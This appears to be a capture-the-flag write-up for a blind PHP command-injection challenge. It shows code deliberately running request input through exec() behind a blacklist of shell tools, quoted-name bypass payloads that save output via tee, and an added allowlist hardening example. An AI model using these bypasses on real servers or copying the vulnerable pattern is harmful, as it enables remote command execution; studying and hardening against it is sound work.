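<?php
// Challenge source: shows its own code, then runs a filtered command.
highlight_file(__FILE__);
if (isset($_GET['url'])) {
    $url = $_GET['url'];
    // Blacklist of command names and shell metacharacters (case-insensitive).
    if (preg_match('/bash|nc|wget|ping|ls|cat|more|less|phpinfo|base64|echo|php|python|mv|cp|la|\-|\*|\"|\>|\<|\%|\$/i', $url)) {
        echo "Sorry,you can't use this.";
    } else {
        echo "Can you see anything?";
        // exec() output is never printed, so the command result is not echoed back.
        exec($url);
    }
}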
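This is a blind RCE challenge (the command output is not echoed back). nc and bash are blocked, so a reverse shell is not an option; $, php and python are blocked, so a second-stage RCE is not an option either.
In Linux, a command name can be split with '' or "" or / and it will still execute.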



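l''s executes normally. Use the tee command to save the output stream of ls to a file: l''s |tee 1.txt, then request 1.txt to read the directory listing. Then use tac /flllll''aaaaaaggggggg|tee 2.txt to retrieve the flag.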
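
Why the filter fails, and one way to harden the handler, as an added example that is not part of the challenge's code: the shell removes the empty quotes before it resolves the command name, so the regex and the shell see different strings. The action names, program paths and the `run_action` helper are assumptions made for illustration.

```php
<?php
// Added example, not the challenge's code. Action names, program paths and
// run_action() are hypothetical.

// The challenge's blacklist, copied from the page.
const BLACKLIST = '/bash|nc|wget|ping|ls|cat|more|less|phpinfo|base64|echo|php|python|mv|cp|la|\-|\*|\"|\>|\<|\%|\$/i';

function blacklist_allows(string $input): bool
{
    return preg_match(BLACKLIST, $input) === 0;
}

// Hardened form: the client picks an action name, never a command string.
const ACTIONS = [
    'uptime' => ['/usr/bin/uptime'],
    'disk'   => ['/bin/df', '/tmp'],
];

function run_action(string $name): ?string
{
    if (!array_key_exists($name, ACTIONS)) {
        return null;                    // unknown action: nothing is executed
    }
    // An array command (PHP >= 7.4) is executed directly, without a shell,
    // so quotes and pipes in request data are never interpreted.
    $proc = proc_open(ACTIONS[$name], [1 => ['pipe', 'w']], $pipes);
    if (!is_resource($proc)) {
        return null;
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    proc_close($proc);
    return $out;
}

// Inputs taken from the write-up, checked against both designs.
$inputs = ["ls", "l''s |tee 1.txt", "tac /flllll''aaaaaaggggggg|tee 2.txt"];
foreach ($inputs as $input) {
    printf("%-40s blacklist:%-6s allowlist:%s\n",
        $input,
        blacklist_allows($input) ? 'PASS' : 'block',
        array_key_exists($input, ACTIONS) ? 'PASS' : 'block');
}
```

Only the plain `ls` is stopped by the blacklist; both quoted strings pass it, while the allowlist rejects all three because none is a known action name.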

